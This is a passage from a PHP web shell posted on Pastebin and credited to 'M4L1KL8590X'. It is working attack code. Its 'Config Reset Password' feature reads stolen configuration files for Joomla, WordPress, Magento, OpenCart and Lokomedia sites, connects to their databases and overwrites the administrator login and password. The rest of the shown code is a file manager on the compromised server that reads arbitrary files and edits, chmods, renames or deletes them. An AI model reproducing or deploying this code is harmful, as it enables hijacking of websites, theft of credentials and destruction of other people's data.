  2463.                 echo "</div>";
  2464.                 mysql_close($conn);
  2465.             }
  2466.         }
  2467. }
  2468. elseif($_GET['c'] == 'newfile') {
  2469.     if($_POST['new_save_file']) {
  2470.         $newfile = htmlspecialchars($_POST['newfile']);
  2471.         $fopen = fopen($newfile, "a+");
  2472.         if($fopen) {
  2473.             $act = "<script>window.location='?c=edit&dir=".$path."&file=".$_POST['newfile']."';</script>";
  2474.         } else {
  2475.             $act = "<font color=red>permission denied</font>";
  2476.         }
  2477.     }
  2478.     echo $act;
  2479.     echo "<center><form method='post'>
  2480.     Filename: <input type='text' name='newfile' value='$path/newfile.php' style='width: 450px;' height='10'>
  2481.     <input type='submit' name='new_save_file' value='Submit'>
  2482.     </form></center>";
  2483. } elseif($_GET['c'] == 'newfolder') {
  2484.     if($_POST['new_save_folder']) {
  2485.         $new_folder = $path.'/'.htmlspecialchars($_POST['newfolder']);
  2486.         if(!mkdir($new_folder)) {
  2487.             $act = "<font color=red>permission denied</font>";
  2488.         } else {
  2489.             $act = "<script>window.location='?dir=".$path."';</script>";
  2490.         }
  2491.     }
  2492.     echo $act;
  2493.     echo "<center><form method='post'>
  2494.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2495.     <input type='submit' name='new_save_folder' value='Submit'>
  2496.     </form></center>";
  2497. }
  2498. elseif($_GET['c'] == 'changer') {
  2499. if($_POST['sikat']) {
  2500.       echo "<center><h1>Config Reset Password</h1>
  2501.     <form method='post'>
  2502.     Link Config: <br>
  2503.     <textarea name='link' style='width: 450px; height:250px;'>";
  2504.     GrabUrl($_POST['linkconfig'],'txt');
  2505.     echo"</textarea><br>
  2506.         User Baru : <input type='text' name='newuser' placeholder='M4L1KL8590X'> <br><br>
  2507.         Password Baru : <input type='text' name='newpasswd' placeholder='M4L1KL8590X'><br><br>
  2508.     <input type='submit' style='width: 450px;' name='masschanger' value='Hajar!!'>
  2509.     </form></center>";
  2510.   }else {
  2511.     echo '<center>
  2512.     <h1>Config Reset Password</h1>
  2513.     <form method="post">
  2514.     </select><br>
  2515.     Link Config :<br>
  2516.     <input type="text" name="linkconfig" height="10" style="width: 450px;" placeholder="http://jembod.com/rabbitz_symconf/"><br>
  2517.     <input type="submit" style="width: 450px;" name="sikat" value="Change User!!">
  2518.     </form></center>';
  2519.   }
  2520.   if($_POST['masschanger']) {
  2521.     $user = $_POST['newuser'];
  2522.     $pass = $_POST['newpasswd'];
  2523.     $passx = md5($pass);
  2524.     $link = explode("\r\n", $_POST['link']);
  2525.     foreach($link as $file_conf) {
  2526.       $config = file_get_contents($file_conf);
  2527.       if(preg_match("/JConfig|joomla/",$config)) {
  2528.         $dbhost = ambilkata($config,"host = '","'");
  2529.         $dbuser = ambilkata($config,"user = '","'");
  2530.         $dbpass = ambilkata($config,"password = '","'");
  2531.         $dbname = ambilkata($config,"db = '","'");
  2532.         $dbprefix = ambilkata($config,"dbprefix = '","'");
  2533.         $prefix = $dbprefix."users";
  2534.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2535.         $db = mysql_select_db($dbname);
  2536.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2537.         $result = mysql_fetch_array($q);
  2538.         $id = $result['id'];
  2539.         $site = ambilkata($config,"sitename = '","'");
  2540.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  2541.         echo "CMS: Joomla<br>";
  2542.         if($site == '') {
  2543.           echo "Sitename => <font color=red>Error Cok</font><br>";
  2544.         } else {
  2545.           echo "Sitename => $site<br>";
  2546.         }
  2547.         if(!$update OR !$conn OR !$db) {
  2548.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2549.         } else {
  2550.           echo "[+] username: <font color=lime>$user</font><br>";
  2551.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2552.         }
  2553.         mysql_close($conn);
  2554.       } elseif(preg_match("/WordPress/",$config)) {
  2555.         $dbhost = ambilkata($config,"DB_HOST', '","'");
  2556.         $dbuser = ambilkata($config,"DB_USER', '","'");
  2557.         $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2558.         $dbname = ambilkata($config,"DB_NAME', '","'");
  2559.         $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2560.         $prefix = $dbprefix."users";
  2561.         $option = $dbprefix."options";
  2562.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2563.         $db = mysql_select_db($dbname);
  2564.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2565.         $result = mysql_fetch_array($q);
  2566.         $id = $result[ID];
  2567.         $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2568.         $result2 = mysql_fetch_array($q2);
  2569.         $target = $result2[option_value];
  2570.         if($target == '') {
  2571.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2572.         } else {
  2573.           $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2574.         }
  2575.         $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  2576.         echo "CMS: Wordpress<br>";
  2577.         echo $url_target;
  2578.         if(!$update OR !$conn OR !$db) {
  2579.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2580.         } else {
  2581.           echo "[+] username: <font color=lime>$user</font><br>";
  2582.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2583.         }
  2584.         mysql_close($conn);
  2585.       } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2586.         $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2587.         $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2588.         $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2589.         $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2590.         $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2591.         $prefix = $dbprefix."admin_user";
  2592.         $option = $dbprefix."core_config_data";
  2593.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2594.         $db = mysql_select_db($dbname);
  2595.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2596.         $result = mysql_fetch_array($q);
  2597.         $id = $result[user_id];
  2598.         $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2599.         $result2 = mysql_fetch_array($q2);
  2600.         $target = $result2[value];
  2601.         if($target == '') {
  2602.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2603.         } else {
  2604.           $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2605.         }
  2606.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  2607.         echo "CMS: Magento<br>";
  2608.         echo $url_target;
  2609.         if(!$update OR !$conn OR !$db) {
  2610.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2611.         } else {
  2612.           echo "[+] username: <font color=lime>$user</font><br>";
  2613.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2614.         }
  2615.         mysql_close($conn);
  2616.       } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2617.         $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2618.         $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2619.         $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2620.         $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2621.         $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2622.         $prefix = $dbprefix."user";
  2623.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2624.         $db = mysql_select_db($dbname);
  2625.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2626.         $result = mysql_fetch_array($q);
  2627.         $id = $result[user_id];
  2628.         $target = ambilkata($config,"HTTP_SERVER', '","'");
  2629.         if($target == '') {
  2630.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2631.         } else {
  2632.           $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2633.         }
  2634.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  2635.         echo "CMS: OpenCart<br>";
  2636.         echo $url_target;
  2637.         if(!$update OR !$conn OR !$db) {
  2638.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2639.         } else {
  2640.           echo "[+] username: <font color=lime>$user</font><br>";
  2641.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2642.         }
  2643.         mysql_close($conn);
  2644.       } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2645.         $dbhost = ambilkata($config,'server = "','"');
  2646.         $dbuser = ambilkata($config,'username = "','"');
  2647.         $dbpass = ambilkata($config,'password = "','"');
  2648.         $dbname = ambilkata($config,'database = "','"');
  2649.         $prefix = "users";
  2650.         $option = "identitas";
  2651.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2652.         $db = mysql_select_db($dbname);
  2653.         $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2654.         $result = mysql_fetch_array($q);
  2655.         $target = $result[alamat_website];
  2656.         if($target == '') {
  2657.           $target2 = $result[url];
  2658.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2659.           if($target2 == '') {
  2660.             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2661.           } else {
  2662.             $cek_login3 = file_get_contents("$target2/adminweb/");
  2663.             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2664.             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2665.               $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2666.             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2667.               $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2668.             } else {
  2669.               $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2670.             }
  2671.           }
  2672.         } else {
  2673.           $cek_login = file_get_contents("$target/adminweb/");
  2674.           $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2675.           if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2676.             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2677.           } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2678.             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2679.           } else {
  2680.             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2681.           }
  2682.         }
  2683.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  2684.         echo "CMS: Lokomedia<br>";
  2685.         if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2686.           echo $url_target2;
  2687.         } else {
  2688.           echo $url_target;
  2689.         }
  2690.         if(!$update OR !$conn OR !$db) {
  2691.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2692.         } else {
  2693.           echo "[+] username: <font color=lime>$user</font><br>";
  2694.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2695.         }
  2696.         mysql_close($conn);
  2697.       }
  2698.     }
  2699.   }    
  2700. }
  2701. else if(isset($_GET['src'])){
  2702. echo "<tr><td>Current File : ";
  2703. echo $_GET['src'];
  2704. echo '</tr></td></table><br />';
  2705. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['src'])).'</pre>');
  2706. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  2707. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  2708. if($_POST['opt'] == 'chmod'){
  2709. if(isset($_POST['perm'])){
  2710. if(chmod($_POST['path'],$_POST['perm'])){
  2711. echo '<font color="green">Success !</font><br/>';
  2712. }else{
  2713. echo '<font color="red">Denied !</font><br />';
  2714. }
  2715. }
  2716. echo '<form method="POST">
  2717. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  2718. <input type="hidden" name="path" value="'.$_POST['path'].'">
  2719. <input type="hidden" name="opt" value="chmod">
  2720. <input type="submit" value="Go" />
  2721. </form>';
  2722. }
  2723. elseif(isset($_GET['src'])){
  2724.     echo "<tr><td>";
  2725.     echo '</tr></td></table><br />';
  2726.     echo "<textarea cols=80 rows=20 name='src'>".htmlspecialchars(file_get_contents($_GET['src']))."</textarea><br />";
  2727. }elseif($_POST['opt'] == 'rename'){
  2728. if(isset($_POST['newname'])){
  2729. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  2730. echo '<font color="green">Success !</font><br/>';
  2731. }else{
  2732. echo '<font color="red">Denied !</font><br />';
  2733. }
  2734. $_POST['name'] = $_POST['newname'];
  2735. }
  2736. echo '<form method="POST">
  2737. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  2738. <input type="hidden" name="path" value="'.$_POST['path'].'">
  2739. <input type="hidden" name="opt" value="rename">
  2740. <input type="submit" value="Go" />
  2741. </form>';
  2742. }elseif($_POST['opt'] == 'edit'){
  2743. if(isset($_POST['src'])){
  2744. $fp = fopen($_POST['path'],'w');
  2745. if(fwrite($fp,$_POST['src'])){
  2746. echo '<font color="green">Success !</font><br/>';
  2747. }else{
  2748. echo '<font color="red">Denied !</font><br/>';
  2749. }
  2750. fclose($fp);
  2751. }
  2752. echo '<form method="POST">
  2753. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  2754. <input type="hidden" name="path" value="'.$_POST['path'].'">
  2755. <input type="hidden" name="opt" value="edit">
  2756. <input type="submit" value="Save" />
  2757. </form>';
  2758. }
  2759. echo '</center>';
  2760. }else{
  2761. echo '</table><br/><center>';
  2762. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  2763. if($_POST['type'] == 'dir'){
  2764. if(rmdir($_POST['path'])){
  2765. echo '<font color="green">Success !</font><br/>';
  2766. }else{
  2767. echo '<font color="red">Denied !                                                                                                             </font><br/>';
  2768. }
  2769.  
  2770. }elseif($_POST['type'] == 'file'){
  2771. if(unlink($_POST['path'])){
  2772. echo '<font color="green">Success</font><br/>';
  2773. }else{
  2774. echo '<font color="red">Denied</font><br/>';
  2775. }
  2776. }
  2777. }
  2778. echo '</center>';
  2779. $scandir = scandir($path);
  2780. echo '<div><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  2781. <tr>
  2782. <th><center>Name</center></th>
  2783. <th><center>Size</center></th>
  2784. <th><center>Permission</center></th>
  2785. <th><center>Action</center></th>
  2786. </tr>';
  2787.  
  2788. foreach($scandir as $dir){
  2789. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  2790. echo '<tr>
  2791. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  2792. <td><center>--</center></td>
  2793. <td><center>';
  2794. if(is_writable($path.'/'.$dir)) echo '<font color=#1dff00>';
  2795. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  2796. echo perms($path.'/'.$dir);
  2797. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  2798.  
  2799. echo '</center></td>
  2800. <td><center><form method="POST" action="?option&path='.$path.'">
  2801. <select name="opt">
  2802. <option value="">Select</option>
  2803. <option value="chmod">Chmod</option>
  2804. <option value="rename">Rename</option>
  2805. </select>
  2806. <input type="hidden" name="type" value="dir">
  2807. <input type="hidden" name="name" value="'.$dir.'">
  2808. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  2809. <input type="submit" value=">">
  2810. </form></center></td>
  2811. </tr>';
  2812. }
  2813. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  2814. foreach($scandir as $file){
  2815. if(!is_file($path.'/'.$file)) continue;
  2816. $size = filesize($path.'/'.$file)/1024;
  2817. $size = round($size,3);
  2818. if($size >= 1024){
  2819. $size = round($size/1024,2).' MB';
  2820. }else{
  2821. $size = $size.' KB';
  2822. }
  2823.  
  2824. echo '<tr>
  2825. <td><a href="?src='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  2826. <td><center>'.$size.'</center></td>
  2827. <td><center>';
  2828. if(is_writable($path.'/'.$file)) echo '<font color=#1dff00>';
  2829. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  2830. echo perms($path.'/'.$file);
  2831. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  2832. echo '</center></td>
  2833. <td><center><form method="POST" action="?option&path='.$path.'">
  2834. <select name="opt">
  2835. <option value="">Select</option>
  2836. <option value="delete">Delete</option>
  2837. <option value="chmod">Chmod</option>
  2838. <option value="rename">Rename</option>
  2839. <option value="edit">Edit</option>
  2840. </select>
  2841. <input type="hidden" name="type" value="file">
  2842. <input type="hidden" name="name" value="'.$file.'">
  2843. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  2844. <input class="abir" type="submit" value=">">
  2845. </form></center></td>
  2846. </tr>';
  2847. }
  2848. echo '</table>
  2849. </div>';
  2850. }
  2851. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center"><tr>
  2852. <td>';
  2853. echo "<hr color='#38475e'>Copyright &copy; ".date("Y")." - <font color='white'>Recoded con7extshell Shell By M4L1KL8590X</td>
  2854. </tr>";
  2855.     echo "</body>
  2856. </html>";
  2857. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top